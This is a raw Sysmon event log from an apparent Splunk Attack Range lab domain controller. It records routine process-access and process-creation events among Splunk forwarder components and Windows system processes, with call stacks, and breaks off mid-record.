10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.785{59A5CD1D-9058-6005-1A01-00000000A301}10043504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.630{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.176{59A5CD1D-9058-6005-1901-00000000A301}11961372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 